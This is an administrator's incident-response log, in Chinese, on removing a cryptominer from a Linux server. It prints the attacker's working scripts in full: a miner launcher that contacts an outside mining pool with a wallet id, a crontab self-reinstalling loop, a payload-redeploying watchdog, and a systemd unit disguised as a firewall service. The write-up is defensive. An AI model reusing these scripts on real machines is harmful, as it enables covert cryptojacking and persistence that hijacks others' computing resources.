公司服务器被挖矿了,IDC 处理也没处理干净,登录服务器查看还是有残留的任务。
[root@nfs ~]# crontab -l
@daily /dev/shm/.lr/1
@reboot /dev/shm/.lr/run > /dev/null 2>&1 & disown
@monthly /dev/shm/.lr/run > /dev/null 2>&1 & disown
#确认服务器ps未被修改
[root@nfs ~]# rpm -qf `which ps`
procps-ng-3.3.10-23.el7.x86_64
#检查文件完整性(rpm -V 无输出表示该包内的文件未被篡改)
[root@nfs ~]# rpm -V procps-ng
查看定时任务中脚本的内容
[root@nfs ~]# cat /dev/shm/.lr/1
#!/bin/bash
#made by Maz4id#1363
# Miner launcher ("1"): invoked @daily from the crontab and every 5 s by the
# companion "run" loop. The install directory is read from /tmp/.SQL/.db,
# which "run" fills with its own working directory.
locatie=$(cat /tmp/.SQL/.db)
# Start only when no process named exactly "syst3md" exists (the name is
# presumably chosen to blend in next to "systemd" in ps output).
if ! pgrep -x syst3md >/dev/null; then
# Starts the binary from the recorded directory with miner-style options
# (-o pool host:port, -u wallet id, --donate-level, -p), output discarded,
# backgrounded and disowned so it outlives the parent shell.
# Detection: `pgrep -x syst3md`, outbound connections to 92.42.44.100:1111,
# the wallet string below, and executables living under /dev/shm.
$locatie/./syst3md -o 92.42.44.100:1111 -u 48Y15PX7Ua4b7pDWB62vSeH5RpDrKJiDjjfP7mcimSQJgAEAzNbyYvfcZco5abYJmY727sPx2zyN9AKs85XBvt1UCnWhP4L --donate-level 1 -p auto4 > /dev/null 2>&1 & disown $*
else
# No-op when the miner is already running.
:
fi
[root@nfs ~]# cat /dev/shm/.lr/run
#!/bin/bash
#made by Maz4id#1363
# Persistence loop ("run"): records its install directory, re-installs the
# crontab whenever it is missing, and periodically runs the launcher "1".
# The usage text is only printed; execution continues regardless of $#.
if [ $# != 1 ]; then
echo " usage: $0 > /dev/null 2>&1 & disown"
fi
# Read the recorded directory. This happens before the file is created
# below, so on a fresh install it is empty; the variable is not referenced
# again in this script (later steps re-read the file with $(cat ...)).
locatie=$(cat /tmp/.SQL/.db)
# Ensure /tmp/.SQL/.db exists and holds the current working directory, i.e.
# wherever "run" was started from (/dev/shm/.lr in this incident). Both the
# directory and the file start with "." so a plain ls does not show them.
if [ -f /tmp/.SQL/.db ]; then
:
else
if [ -d /tmp/.SQL ]; then
echo $(pwd) > /tmp/.SQL/.db
else
mkdir /tmp/.SQL
echo $(pwd) > /tmp/.SQL/.db
fi
fi
# Re-installs the crontab whenever no entry containing "run" is present.
# It builds a temp file ".tempo" under the recorded directory with three
# entries (@daily launcher "1", @reboot and @monthly this "run" script),
# loads it with `crontab <file>` (which replaces the whole crontab), then
# deletes the temp file.
# The path prefix is re-read from /tmp/.SQL/.db on every use: if that file
# has been removed, cat fails, the prefix expands to empty, the temp file is
# written to /.tempo and the entries come out as "/1" and "/run".
# Detection: crontab entries pointing at /dev/shm, or bare "/1" / "/run".
crontabcalumea() {
if ! crontab -l | grep -q 'run'; then
rm -rf $(cat /tmp/.SQL/.db)/.tempo
echo "@daily $(cat /tmp/.SQL/.db)/1" >> $(cat /tmp/.SQL/.db)/.tempo
sleep 1
echo "@reboot $(cat /tmp/.SQL/.db)/run > /dev/null 2>&1 & disown" >> $(cat /tmp/.SQL/.db)/.tempo
sleep 1
echo "@monthly $(cat /tmp/.SQL/.db)/run > /dev/null 2>&1 & disown" >> $(cat /tmp/.SQL/.db)/.tempo
sleep 1
crontab $(cat /tmp/.SQL/.db)/.tempo
sleep 1
rm -rf $(cat /tmp/.SQL/.db)/.tempo
fi
}
# Main loop: every 5 s run the launcher "1" (which starts the miner if it is
# not running) and re-assert the crontab. The loop never exits, so deleting
# the files is not enough to stop it: every live "run" process must be
# killed too, otherwise the crontab is re-created within seconds.
sleep 5
while :
do
$(cat /tmp/.SQL/.db)/1
crontabcalumea
sleep 5
done
可以看到脚本在服务器上创建隐藏目录并向外部 IP 发送信息。这里先删除脚本中涉及的路径
[root@nfs ~]# rm -rf /tmp/.SQL/.db /tmp/.SQL /dev/shm/.lr/
#结束syst3md进程
[root@nfs ~]# ps aux|grep syst3md
root 8897 0.6 31.2 2617096 1210876 ? Sl 6月11 695:26 /dev/shm/.lr/./syst3md -o 92.42.44.100:1111 -u 48Y15PX7Ua4b7pDWB62vSeH5RpDrKJiDjjfP7mcimSQJgAEAzNbyYvfcZco5abYJmY727sPx2zyN9AKs85XBvt1UCnWhP4L --donate-level 1 -p auto4
[root@nfs ~]# kill -9 8897
[root@nfs ~]# ps aux|grep syst3md
root 30940 0.0 0.0 112824 980 pts/0 R+ 09:02 0:00 grep --color=auto syst3md
#清理crontab任务
[root@nfs ~]# crontab -l
#清理之后任务又出现了(/dev/shm/.lr/run 进程仍在运行,而 /tmp/.SQL/.db 已被删除,所以它重新写入的路径前缀为空,变成了 /1 和 /run)
[root@nfs ~]# crontab -l
@daily /1
@monthly /run > /dev/null 2>&1 & disown
@reboot /run > /dev/null 2>&1 & disown
@reboot /run > /dev/null 2>&1 & disown
#查看/var/log/messages日志
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh: 第 15 行:cd: /dev/shm/.lr: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh:行15: ./r: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh: 第 19 行:cd: /dev/shm/.lr: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: /usr/bin/blrvdlm.sh:行19: ./r: 没有那个文件或目录
Aug 28 09:05:34 nfs Diskutilization: Failed to start with command1 and command2.
Aug 28 09:05:34 nfs Diskutilization: Checking if it's a directory problem
Aug 28 09:09:36 nfs systemd: blrvdlm.service: main process exited, code=killed, status=9/KILL
Aug 28 09:09:37 nfs systemd: Unit blrvdlm.service entered failed state.
Aug 28 09:09:37 nfs systemd: blrvdlm.service failed.
#上面提示的/usr/bin/blrvdlm.sh脚本,查看内容
[root@nfs ~]# cat /usr/bin/blrvdlm.sh
#!/bin/bash
#Blr va da la muie lachetilor <3
# (Romanian tag left by the author; kept verbatim because it is a handy
# string to search for when hunting other copies of this script.)
# Watchdog started by blrvdlm.service: keeps the "syst3md" miner process
# alive and re-deploys its payload from /tmp/.../.lr.zip when /dev/shm/.lr
# is missing. The "Firewall" messages are cosmetic; nothing here touches a
# firewall.
# Set the name of the process to check for
# (Both variables are assigned but never referenced; the values are repeated
# literally in the commands below.)
process_name="syst3md"
location="/dev/shm/.lr"
# Check if the process is running
while :
do
# Process test via ps|grep; `grep -v grep` drops the grep command itself.
if ps aux | grep -v grep | grep "syst3md" > /dev/null; then
echo "Firewall is running."
sleep 10
else
echo "Firewall is not running. Starting it now..."
sleep 10
# "cd ... ; ./r" uses ";" rather than "&&": when /dev/shm/.lr is gone the cd
# fails and ./r is still attempted in the current directory, which is what
# produced the paired "cd: ... No such file" / "./r: No such file" lines in
# /var/log/messages.
cd /dev/shm/.lr ; ./r
# Try to execute commands to start the process
if
cd /dev/shm/.lr ; ./r
then
echo "Successfully started ."
sleep 10
else
echo "Failed to start with command1 and command2."
echo "Checking if it's a directory problem"
sleep 10
# Verify if a directory exists or not
# Tests /dev/shm/.lr/run with -d, but "run" is executed as a script from the
# crontab, so -d is presumably always false and the redeploy branch runs.
if [ -d /dev/shm/.lr/run ]
then
echo "Directory exists."
else
echo "Directory does not exist."
echo "Loading payload!"
# Re-deploy: the archive lives in a directory literally named "..." under
# /tmp (easy to overlook in ls output), is unzipped into /dev/shm/.lr, made
# executable and started via ./r. Removing /dev/shm/.lr alone is therefore
# not enough: /tmp/.../.lr.zip and this service must be removed as well.
rm -rf /dev/shm/.lr ; cp /tmp/.../.lr.zip /dev/shm/ ; cd /dev/shm ; unzip .lr ; rm -rf .lr.zip ; cd .lr ; chmod +x * ; ./r
sleep 60
fi
fi
fi
done
上面日志中还涉及了blrvdlm.service服务,查看服务
[root@nfs ~]# systemctl status blrvdlm.service
● blrvdlm.service - Linux Firewall Execution
Loaded: loaded (/etc/systemd/system/blrvdlm.service; disabled; vendor preset: disabled)
Active: active (running) since 一 2023-08-28 09:10:07 CST; 1min 10s ago
Docs: https://lfdblr.com/
Main PID: 707 (blrvdlm.sh)
Tasks: 2
Memory: 308.0K
CGroup: /system.slice/blrvdlm.service
├─707 /bin/bash /usr/bin/blrvdlm.sh
└─799 sleep 60
#停止并删除上面的进程
[root@nfs ~]# systemctl stop --now blrvdlm.service
#查看服务文件内容
[root@nfs ~]# cat /etc/systemd/system/blrvdlm.service
[Unit]
# Description and Documentation are decoys: this unit runs the miner
# watchdog /usr/bin/blrvdlm.sh, not a firewall. The status output shows it
# "disabled" yet active, so how it was started is not visible here.
Description=Linux Firewall Execution
Documentation=https://lfdblr.com/
[Service]
Type=simple
# Runs as root; the script writes under /dev/shm and /tmp and spawns the miner.
User=root
Group=root
TimeoutStartSec=0
# Restart=on-failure with RestartSec=30s: a SIGKILL of blrvdlm.sh counts as a
# failure, so systemd restarts it about 30 s later (the log shows the unit
# "failed" at 09:09:37 and the status shows it running again from 09:10:07).
# Stop the unit first, then remove the unit file and the script.
Restart=on-failure
RestartSec=30s
#ExecStartPre=
ExecStart=/usr/bin/blrvdlm.sh
# Log lines are tagged "Diskutilization" in /var/log/messages rather than
# "blrvdlm", so search the syslog identifier as well as the script name.
SyslogIdentifier=Diskutilization
#ExecStop=
[Install]
WantedBy=multi-user.target
#结束blrvdlm.sh并删除对应文件
[root@nfs ~]# rm -rf /etc/systemd/system/blrvdlm.service
[root@nfs ~]# ps aux|grep "blrvdlm.sh"
root 549 0.0 0.0 112824 992 pts/0 S+ 09:09 0:00 grep --color=auto blrvdlm.sh
root 1499 0.0 0.0 114004 1392 ? Ss 6月11 38:31 /bin/bash /usr/bin/blrvdlm.sh
[root@nfs ~]# kill -9 1499
[root@nfs ~]# rm -rf /usr/bin/blrvdlm.sh
#查看定时任务中的sh是否有未结束的进程
[root@nfs ~]# ps aux|grep -Ei ".lr/1|.lr/run"
root 927 0.0 0.0 113792 1428 ? S 7月01 74:25 /bin/bash /dev/shm/.lr/run
root 2137 0.0 0.0 112824 1016 pts/0 R+ 09:16 0:00 grep --color=auto -Ei .lr/1|.lr/run
root 25379 0.0 0.0 113792 1940 ? S 8月01 34:36 /bin/bash /dev/shm/.lr/run
#停止进程
[root@nfs ~]# kill -9 927 25379
#清除定时任务后再次查看,挖矿脚本已彻底删除(注意 blrvdlm.sh 中还引用了 /tmp/.../.lr.zip 作为重新释放的载荷,也应检查并删除)
[root@nfs ~]# watch -n 2 "crontab -l"